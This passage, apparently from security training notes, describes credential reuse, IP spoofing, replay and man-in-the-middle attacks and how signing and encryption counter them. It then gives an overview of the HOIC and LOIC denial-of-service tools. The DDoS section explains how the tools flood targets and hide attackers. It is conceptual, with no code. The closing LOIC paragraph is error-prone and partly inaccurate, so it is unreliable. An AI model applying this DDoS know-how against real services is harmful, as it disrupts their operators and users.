log in. No matter how tempting it may be to reuse credentials for your email, bank account,
and your favorite sports forum, it’s possible that one day the forum will get hacked, giving
an attacker easy access to your email and bank account. When it comes to credentials,
variety is essential. Password managers are available and can be helpful when it comes to
managing the various credentials you use.

This is just a selection of common attack types and techniques (follow this link to learn
more about web application vulnerabilities specifically). It is not intended to be exhaustive,
and attackers do evolve and develop new methods as needed; however, being aware of, and
mitigating these types of attacks will significantly improve your security posture.

IP Spoofing
IP spoofing is used by an attacker to convince a system that it is communicating with a known,
trusted entity and provide the attacker with access to the system. The attacker sends a packet
with the IP source address of a known, trusted host instead of its own IP source address to a
target host. The target host might accept the packet and act upon it.

Replay
A replay attack occurs when an attacker intercepts and saves old messages and then tries to send
them later, impersonating one of the participants. This type can be easily countered with session
timestamps or nonce (a random number or a string that changes with time).

Currently, there is no single technology or configuration to prevent all MitM attacks. Generally,
encryption and digital certificates provide an effective safeguard against MitM attacks, assuring
both the confidentiality and integrity of communications. But a man-in-the-middle attack can be
injected into the middle of communications in such a way that encryption will not help — for
example, attacker “A” intercepts public key of person “P” and substitute it with his own public
key. Then, anyone wanting to send an encrypted message to P using P’s public key is
unknowingly using A’s public key. Therefore, A can read the message intended for P and then
send the message to P, encrypted in P’s real public key, and P will never notice that the message
was compromised. In addition, A could also modify the message before resending it to P. As you
can see, P is using encryption and thinks that his information is protected but it is not, because of
the MitM attack.

So, how can you make sure that P’s public key belongs to P and not to A? Certificate authorities
and hash functions were created to solve this problem. When person 2 (P2) wants to send a
message to P, and P wants to be sure that A will not read or modify the message and that the
message actually came from P2, the following method must be used:

1. P2 creates a symmetric key and encrypts it with P’s public key.

23
 2. P2 sends the encrypted symmetric key to P.
3. P2 computes a hash function of the message and digitally signs it.
4. P2 encrypts his message and the message’s signed hash using the symmetric key and
sends the entire thing to P.
5. P is able to receive the symmetric key from P2 because only he has the private key to
decrypt the encryption.
6. P, and only P, can decrypt the symmetrically encrypted message and signed hash because
he has the symmetric key.
7. He is able to verify that the message has not been altered because he can compute the
hash of received message and compare it with digitally signed one.
8. P is also able to prove to himself that P2 was the sender because only P2 can sign the
hash so that it is verified with P2 public key.

What is High Orbit Ion Cannon (HOIC)

High Orbit Ion Cannon (HOIC) is a free, open-source network stress application developed by
Anonymous, a hacktivist collective, to replace the Low Orbit Ion Cannon (LOIC). Used
for denial of service (DoS) and distributed denial of service (DDoS) attacks, it functions by
flooding target systems with junk HTTP GET and POST requests. HOIC was designed to
improve upon several LOIC application flaws, including:

 Detection – HOIC uses booster scripts that let perpetrators scatter attack traffic and hide their
geolocation. This differs from LOIC, which isn’t capable of obfuscating attacker IP addresses.
 Firepower – An individual HOIC user can launch a significant number of junk requests at a
given time; as few as 50 perpetrators can execute a successful DDoS attack. This differs from
LOIC, which requires thousands of users to coordinate and launch an attack.
Anonymous first used HOIC in 2012 during Operation Megaupload — at the time one of the
largest DDoS assaults ever recorded. It was launched in retaliation for the shutting down of
Megaupload, a filesharing website, and targeted websites belonging to the U.S. Department of
Justice, the Recording Industry Association of America, the Motion Picture Association of
America and Broadcast Music, Inc.

Attack description
Widespread HOIC availability means that users having limited knowledge and experience can
execute potentially significant DDoS attacks. The application can open up to 256 simultaneous
attack sessions at once, bringing down a target system by sending a continuous stream of junk
traffic until legitimate requests are no longer able to be processed.
Unlike LOIC, which is able to launch TCP, UDP and HTTP GET floods, HOIC conducts attacks
based solely on HTTP GET and POST requests.

Add-on scripts called boosters—not available in the LOIC application—can greatly increase
attack magnitude. Boosters also let HOIC users customize the application and randomize assaults
in order to circumvent caching mechanisms that protect servers from traffic spikes.

24
Despite booster use, the attack traffic amount generated by HOIC is still not enough for a single
user to take down a target system. A successful DDoS assault can only be launched when a team
of perpetrators operate HOIC simultaneously. A high degree of coordination is required among
several users.

The LOIC(Low orbit Ion Cannon) is a tool for the DDOS. It used to flood the Tcp/Udp packet
against the server so that server became busy. In tcp/udp packet We can also set the flag,
SYS,Urgent,Fin,Ack, and many more.

Basically LOIC further use many botnet program that install on different-different anonymous
server. when you start a ddos and enter the number of thread then LOCI start their Botnet to
flood the half http request to the server. and server does not understand the half http request so it
take time to response it, loic send many many request within second so server used their all
resourece to response the request then after some hour it exceed his CPU limit.

25